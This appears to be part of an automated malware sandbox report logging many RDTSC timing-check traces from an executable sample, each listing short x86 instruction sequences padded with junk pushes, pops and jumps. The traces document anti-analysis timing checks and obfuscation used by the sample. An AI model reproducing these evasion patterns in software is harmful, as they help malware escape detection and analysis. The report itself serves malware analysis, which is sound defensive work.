Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C31CD second address: 7C31DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jnl 00007FED74F3E516h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C31DD second address: 7C31E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C5977 second address: 7C597B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C597B second address: 7C5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FED75508878h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C5999 second address: 7C59B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7C59B0 second address: 7C59B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DDB67 second address: 7DDB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jo 00007FED74F3E516h 0x0000000e pop ebx 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DDE23 second address: 7DDE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FED75508866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DDE2F second address: 7DDE33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE431 second address: 7DE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE6F8 second address: 7DE70C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FED74F3E516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007FED74F3E516h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE8AF second address: 7DE8B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7DE8B5 second address: 7DE8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 jmp 00007FED74F3E51Fh 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E1602 second address: 7E1609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E1B88 second address: 7E1C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FED74F3E526h 0x0000000b nop 0x0000000c mov edx, 7765BC42h 0x00000011 push dword ptr [ebp+122D3510h] 0x00000017 or edx, dword ptr [ebp+1251D257h] 0x0000001d call 00007FED74F3E519h 0x00000022 jnl 00007FED74F3E538h 0x00000028 push eax 0x00000029 pushad 0x0000002a jno 00007FED74F3E518h 0x00000030 push eax 0x00000031 pushad 0x00000032 popad 0x00000033 pop eax 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 jmp 00007FED74F3E528h 0x0000003e mov eax, dword ptr [eax] 0x00000040 push esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E2E01 second address: 7E2E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E2E0A second address: 7E2E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FED74F3E528h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 7E667E second address: 7E6684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90020 second address: 4E90093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED74F3E520h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED74F3E51Bh 0x0000000f add cx, 563Eh 0x00000014 jmp 00007FED74F3E529h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FED74F3E521h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FED74F3E51Eh 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FED74F3E51Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90093 second address: 4E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90099 second address: 4E9009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9009F second address: 4E900D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FED7550886Dh 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E00 second address: 4E70E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E06 second address: 4E70E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E0A second address: 4E70E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E0E second address: 4E70E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E1D second address: 4E70E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70E21 second address: 4E70E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC010A second address: 4EC011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E51Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC011C second address: 4EC0120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0120 second address: 4EC014B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FED74F3E529h 0x00000011 pop ecx 0x00000012 mov dx, 63B4h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC014B second address: 4EC0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0151 second address: 4EC0155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0155 second address: 4EC0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0159 second address: 4EC016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC016A second address: 4EC0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0170 second address: 4EC0175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0175 second address: 4EC018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov al, bl 0x0000000c mov ax, CE7Bh 0x00000010 popad 0x00000011 pop ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC018C second address: 4EC0190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC0190 second address: 4EC01AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FED75508872h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E500B6 second address: 4E500BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E500BA second address: 4E500D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E500D2 second address: 4E5010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A954h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FED74F3E521h 0x00000016 adc ah, FFFFFFC6h 0x00000019 jmp 00007FED74F3E521h 0x0000001e popfd 0x0000001f mov dl, ch 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5010C second address: 4E50126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 7460D15Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50126 second address: 4E5016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FED74F3E527h 0x0000000c or esi, 6F45CB5Eh 0x00000012 jmp 00007FED74F3E529h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5016F second address: 4E50173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50173 second address: 4E50186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50186 second address: 4E5018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E5018C second address: 4E50190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E50190 second address: 4E501BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FED75508875h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C2A second address: 4E70C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E51Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FED74F3E51Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C5F second address: 4E70C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C65 second address: 4E70C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70C69 second address: 4E70C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E706D4 second address: 4E706F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E706F1 second address: 4E70727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED7550886Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ch, dl 0x00000013 movzx eax, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov si, CE6Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70727 second address: 4E7072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7072C second address: 4E70793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FED7550886Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FED75508879h 0x0000000f or esi, 511A4726h 0x00000015 jmp 00007FED75508871h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 jmp 00007FED7550886Eh 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED7550886Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70793 second address: 4E70799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E705E9 second address: 4E7068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov eax, 79897433h 0x00000011 jmp 00007FED75508878h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FED7550886Bh 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FED75508874h 0x00000025 adc ecx, 5B464698h 0x0000002b jmp 00007FED7550886Bh 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FED75508878h 0x00000037 xor ax, F0F8h 0x0000003c jmp 00007FED7550886Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov ebp, esp 0x00000045 pushad 0x00000046 jmp 00007FED75508874h 0x0000004b push eax 0x0000004c push edx 0x0000004d mov ah, 0Dh 0x0000004f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70356 second address: 4E70373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70373 second address: 4E70385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70385 second address: 4E70389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70389 second address: 4E7038F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E7038F second address: 4E703A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, AAh 0x00000005 mov ah, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov eax, 4591B2A1h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E703A5 second address: 4E7041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED75508877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED75508876h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FED75508870h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx edi, ax 0x0000001d pushfd 0x0000001e jmp 00007FED75508876h 0x00000023 or ecx, 3168E228h 0x00000029 jmp 00007FED7550886Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E801A0 second address: 4E801FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FED74F3E51Bh 0x00000009 and ch, 0000006Eh 0x0000000c jmp 00007FED74F3E529h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FED74F3E520h 0x00000018 jmp 00007FED74F3E525h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E801FD second address: 4E80201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80201 second address: 4E80207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E80207 second address: 4E80268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 1CC7h 0x00000007 push esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f jmp 00007FED75508874h 0x00000014 pushfd 0x00000015 jmp 00007FED75508872h 0x0000001a sbb ecx, 0192BFD8h 0x00000020 jmp 00007FED7550886Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FED75508875h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC000E second address: 4EC004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FED74F3E522h 0x00000012 add cx, 2E68h 0x00000017 jmp 00007FED74F3E51Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov esi, 3988B82Dh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC004A second address: 4EC00BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED7550886Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FED75508872h 0x0000000f sbb si, 2BF8h 0x00000014 jmp 00007FED7550886Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ax, 1D4Bh 0x00000022 mov edx, esi 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FED7550886Fh 0x0000002f xor eax, 4D5E2C6Eh 0x00000035 jmp 00007FED75508879h 0x0000003a popfd 0x0000003b movzx esi, di 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC00BF second address: 4EC00DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FED74F3E529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4EC00DC second address: 4EC00E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9040F second address: 4E9043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FED74F3E51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FED74F3E526h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, DD5Fh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E9043F second address: 4E90444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E90444 second address: 4E904A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 call 00007FED74F3E522h 0x00000015 pushfd 0x00000016 jmp 00007FED74F3E522h 0x0000001b or al, 00000028h 0x0000001e jmp 00007FED74F3E51Bh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 popad 0x00000026 and dword ptr [eax], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FED74F3E522h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70532 second address: 4E70538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wIaKimJFke.exe	RDTSC instruction interceptor: First address: 4E70538 second address: 4E7053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
